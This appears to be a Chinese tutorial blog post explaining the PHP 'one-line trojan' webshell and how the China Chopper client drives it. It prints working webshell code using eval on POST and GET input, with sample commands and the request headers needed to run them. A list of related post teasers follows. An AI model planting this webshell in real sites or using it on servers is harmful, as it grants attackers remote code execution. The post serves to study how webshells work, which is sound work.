一句话木马原理介绍和中国菜刀原理的介绍
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。
今天突然心血来潮写来研究一下一句话木马和菜刀的原理。
下面的原理是自己看其他大佬写的和自己总结的一些介绍。
希望能够帮助老表们~~~
一句话木马原理
我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。
我们来看一下经典的一句话木马
<?php
@eval($_POST['123']);
?>
前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错!
这里是加了@,则不会进行报错
eval()函数是执行PHP代码的一个函数。意思就是eval函数里面如果是PHP代码,那么就可以执行。
$_POST[‘123’]是可以进行一个提交POST参数的操作
eg:
123=phpinfo();
123=echo “hacker by 111”;
可以清楚的看到执行成功了!
错误操作:
最开始自己是进行的bp进行操作但是怎么也没有成功。
然后自己通过浏览器的hackbar进行操作提交,抓包发现http报文前面多加了一个
Content-Type: application/x-www-form-urlencoded
然后自己进行操作成功
content-type的介绍
这里介绍2个常见的:
application/x-www-form-urlencoded :
form表单数据被编码为key/value格式发送到服务器(表单默认的提交数据的格式)或者一种是常见的媒体格式是上传文件之时使用
multipart/form-data :
需要在表单中进行文件上传时,就需要使用该格式(文件上传,上传一句话木马)
其实也可以进行GET方法获取
<?php
@eval($_GET['123']);
?>
其实思想就是:在客户端进行传递参数(php代码)然后通过eval()函数执行PHP代码。造成漏洞,但是一般都是进行POST方法。GET方法介绍是为了更好地理解原理
菜刀原理
菜刀原理介绍
这篇文章里面介绍的非常清楚,自己也进行了一次操作
里面的Wireshark过滤方法
eg:
ip.addr 192.168.0.15 and tcp.port80 and http
ip地址是自己进行操作电脑的ip
菜刀的原理简单的说就是构造http报文(里面是PHP代码)发送给服务器执行(脚本)php代码。
其实如果自己特别厉害,可以不需要菜刀就只要一个浏览器,自己写代码进行提交~~~
最后分享一个菜刀链接。
菜刀官方快照
总结
自己写这一篇文章的目的是为了自己更好的理解
和分享给朋友们,所谓的黑客精神就是分享~~~
希望朋友们希望!!!
一句话木马原理介绍和中国菜刀原理的介绍相关推荐
- 技术剖析中国菜刀原理
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵 这货就是主界面,环境啥的就随意了,IIS,阿 ...
- 菜刀php教程,中国菜刀的功能介绍和使用方法
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了.我记得以前 ...
- 菜刀php教程,中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)
中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了.我记得以前 ...
- 重新学习--中国菜刀
1. 菜刀 (1)中国菜刀的请求方式为post. (2)中国菜刀模拟了百度爬虫的user-agent,中国菜刀默认的连接中使用base64的方式进行编码传输,以便逃脱抓捕. <?php eval ...
- Web安全:一句话木马
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是什么呢? 先来看看 ...
- Web安全!!!一句话木马
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是什么呢? 先来看看 ...
- Web安全-一句话木马
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是什么呢? 先来看看 ...
- mysql中国菜刀连接_中国菜刀(Chopper)详细剖析
在第一部门份的菜刀剖析里面,已经介绍了"中国菜刀"的易用界面以及一些高级特性.--其中最令人注目的,莫过于其作为web shell的大小,aspx版仅有73字节,在硬盘中才4k.而 ...
- mysql 一句话木马_通过mysql写入一句话木马
USEmysql;# MySQL 返回的查询结果为空(即零行). # MySQL 返回的查询结果为空(即零行).CREATE TABLEa( cmd1text NOT NULL);# MySQL 返回 ...
最新文章
- this指向总结(无栗子)
- MySQL 错误 #1055
- Python编程专属骚技巧10
- 内存(Display)、显示器(Monitor)和计算机(Computer)均属于一种产品(Product),其中计算机需要显示器和内存。请用Python语言简要实现这些类及它们之间的关系。
- OC Autorelease
- Python执行系统命令的方法 os.system(),os.popen(),commands
- SharePoint 2013 Step by Step——How to Create a Lookup Column to Another Site(Cross Site) 阅读目录...
- 签名验签服务器性能测试,签名验签服务器 功率
- 虚拟机中安装vmware tools 到 Debian 时出现 找不到kernel headers的提示
- tar压缩及解压命令
- html文本框自动填充,html利用文本框input自动填写当前日期
- QTP教程01 - Add-in Manager插件介绍
- c语言定义函数return,在C语言的函数定义中,如果不需要返回结果,就可以省略return语句。...
- 电力猫服务器的网页,电力猫是如何工作的?
- 多个数的最小公倍数求法
- fastboot 操作
- matlab:双或三方演化博弈,lotka-Volterra 1.双方演化博弈
- 初识Vue——八皇后小游戏
- [FastDFS] 文件路径M00是什么意思
- 禅道9.7开源集成版